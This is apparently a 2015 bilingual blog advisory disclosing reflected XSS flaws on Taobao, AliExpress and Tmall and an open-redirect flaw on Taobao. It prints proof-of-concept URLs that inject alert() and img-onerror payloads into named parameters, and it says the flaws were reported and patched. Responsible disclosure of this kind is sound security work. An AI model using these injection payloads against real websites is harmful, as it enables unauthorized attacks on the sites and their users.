Thursday, 4 June 2015

Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS & Open Redirect Security Vulnerabilities




















Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS & Open Redirect Security Vulnerabilities




Domains Basics:
Alibaba Taobao, AliExpress, Tmall are the top three online shopping websites belonging to Alibaba.


Vulnerability Discover:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore.






(1) Domains Descriptions:


“Taobao is a Chinese website for online shopping similar to eBay and Amazon that is operated in China by Alibaba Group.” (Wikipedia)

“With around 760 million product listings as of March 2013, Taobao Marketplace is one of the world’s top 10 most visited websites according to Alexa. For the year ended March 31, 2013, the combined gross merchandise volume (GMV) of Taobao Marketplace and Tmall.com exceeded 1 trillion yuan.” (Wikipedia)

Alexa ranking 9 at 10:40 am Thursday, 22 January 2015 (GMT+8).



"Launched in 2010, AliExpress.com is an online retail service made up of mostly small Chinese businesses offering products to international online buyers. It is the most visited e-commerce website in Russia" (Wikipedia)



"Taobao Mall, is a Chinese-language website for business-to-consumer (B2C) online retail, spun off from Taobao, operated in the People's Republic of China by Alibaba Group. It is a platform for local Chinese and international businesses to sell brand name goods to consumers in mainland China, Hong Kong, Macau and Taiwan." (Wikipedia)





(2) Vulnerability descriptions:
Alibaba Taobao AliExpress Tmall online electronic shopping website has a cyber security bug problem. It can be exploited by XSS and Covert Redirect attacks. 





(3) Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS
The vulnerability can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 7.


(3.1) Alibaba Taobao Online Electronic Shopping Website (Taobao.com ) XSS (cross site scripting) Security Vulnerability


The vulnerabilities occur at “writecookie.php?" page with "ck" parameter, e.g

POC Code:
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw"-->'-alert(/justqdjing/ )-'";&redirect=0


POC Video:
Blog Details:



(3.2)Alibaba AliExpress Online Electronic Shopping Website (Aliexpress.com) XSS Security Vulnerabilities

The vulnerabilities occur at “landing.php?" page with "cateid" "fromapp" parameters, e.g

POC Code:
/' "><img src=x onerror=prompt(/tetraph/)>
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6</script>/' "><img src=x onerror=prompt(/tetraph/)><!--&fromapp=


POC Video:
Blog Details:



(3.3) Alibaba Tmall Online Electronic Shopping Website (Tmall.com) XSS Security Vulnerability 

The vulnerabilities occur at “writecookie.php?" page with "ck" parameter, e.g

POC Code:
http://www.tmall.com/go/app/sea/writecookie.php?ck=cn"-->'-alert(/tetraph/ )-'";&redirect=1


POC Video:
Blog Details:



This vulnerabilities were disclosed at Full Disclosure. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" All the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards.




(4) Alibaba Taobao(taobao.com)Covert Redirect Security Vulnerability Based on Apple.com

(4.1) Vulnerability description:
Alibaba Taobao has a security problem. It can be exploited by Covert Redirect attacks. Taobao will check whether the redirected URL belongs to domains in Taobao's whitelist, e.g. apple.com

If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection vulnerabilities themselves, a user could be redirected from Taobao to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Taobao directly.

In fact, Apple.com was found can be exploited by Open Redirect vulnerabilities. Those vulnerabilities details will be published in the near future.


(4.2) The vulnerability occurs at "redirect.htm?" page, with parameter “&url”, i.e.

The vulnerabilities can be attacked without user login. Tests were performed on IE (10.0) of Windows 8, Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Safari 6.1.6 of Mac OS X Lion 10.7.


(4.3) Use a website for the tests,the redirected webpage is “http://www.tetraph.com/blog". Just suppose it is malicious.

Vulnerable URL:

POC Code:


Poc Video:
Blog Detail:






Those vulnerablities were reported to Alibaba in 2014 and have been patched by the security team (just checked). Name was listed in the hall of fame by Alibaba.












========================================================




阿里巴巴 淘宝, 天猫, 全球苏卖通 线上电子购物网 跨站脚本攻击 (XSS) & 公开重定向 (Open Redirect) 安全漏洞 



域名:

阿里巴巴 淘宝, 天猫, 全球苏卖通 线上电子购物网 是阿里巴巴集团最大的前三家网上购物电子商务网站.




(1) 漏洞描述:
阿里巴巴 淘宝, 天猫, 全球苏卖通 线上电子购物网 有一个安全问题. 它容易遭受 跨站脚本攻击 (XSS) & 公开重定向 (Open Redirect) 安全漏洞攻击.

漏洞不需要用户登录,测试是基于Windows 7 的 IE (8.0. 7601) 和 Ubuntu (14.04) 的 Firefox (34.0)。



(1.1) 阿里巴巴 淘宝 线上电子购物网 (Taobao.com) XSS (跨站脚本攻击) 安全漏洞 

漏洞链接地点 “writecookie.php?", 参数 "ck" e.g.


POC:
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw"-->'-alert(/tetraph/ )-'";&redirect=0






(1.2) 阿里巴巴 全球速卖通 在线交易平台 (aliexpress.com) XSS (跨站脚本攻击) 安全漏洞 

漏洞链接地点 “mobile_325_promotion_landing.php", 参数 "cateid" 和 "fromapp" e.g.


POC:
/' "><img src=x onerror=prompt(/tetraph/)>
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6</script>/' "><img src=x onerror=prompt(/tetraph/)><!--&fromapp=






(1.3) 阿里巴巴 天猫 线上电子购物网 (Tmall.com) XSS (跨站脚本攻击) 安全漏洞 

漏洞链接地点 “writecookie.php?", 参数 "ck" e.g.

POC:
http://www.tmall.com/go/app/sea/writecookie.php?ck=cn"-->'-alert(/tetraph/ )-'";&redirect=1






(2) 阿里巴巴淘宝线上电子购物网(taobao.comCovert Redirect(隐蔽重定向跳转)安全漏洞基于 苹果网站


(2.1) 漏洞描述:
阿里巴巴 淘宝购物网 有一个安全问题. 它容易遭受 Covert Redirect  (Open Redirect 公开重定向) 漏洞攻击. 所有 属于 Apple.com 的 链接都在白名单内。故而如果 苹果的 网站 本身有 公开重定向问题。那么受害者相当于首先被导向到 苹果官网然后 到 有害网站。 事实上苹果网站被发现有公开重定向问题,过段时间会公布细节。


有漏洞的文件是 "redirect.htm?", 参数 “&url”, i.e.


这个漏洞不需要用户登录。测试是基于Windows 8 的 IE (10.0) 和 Ubuntu (14.04) 的 Firefox (34.0) 及 Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit),Mac OS X Lion 10.7 的 Safari 6.1.6。



(2.2) 用一个创建的网页进行测试,这个网页是“http://www.tetraph.com/blog"。可以假定这个页面是有害的。

漏洞网址:

POC 代码:








这些漏洞在2014年被报告给阿里巴巴安全应急中心,到今天已被修补 (刚刚检查), 名字被列在了白帽子名单感谢表里。




漏洞发现者:
王晶, 数学科学系 (MAS), 物理与数学科学学院 (SPMS), 南洋理工大学 (NTU), 新加坡.





No comments:

Post a Comment